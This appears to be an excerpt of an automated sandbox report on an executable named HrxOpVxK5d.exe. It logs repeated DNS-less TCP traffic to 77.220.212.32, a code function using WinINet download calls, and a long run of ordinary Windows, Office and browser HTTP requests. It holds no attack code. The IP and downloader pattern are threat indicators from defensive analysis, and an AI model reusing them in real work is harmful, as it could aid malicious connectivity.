Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.212.32

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zwDyvpazmB6cKF9&MD=Lc9CB+c+ HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731721649&P2=404&P3=2&P4=XFHiHjFHGhLTg2CaSghZ5WWINN8z%2fN551jQLygkYavsrdRzdPI5ot2rwp4oOaepK7XWbIGdutkBX4tfgiArgMQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: vk9rEZqPlGo/f2vF7QD5nDSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
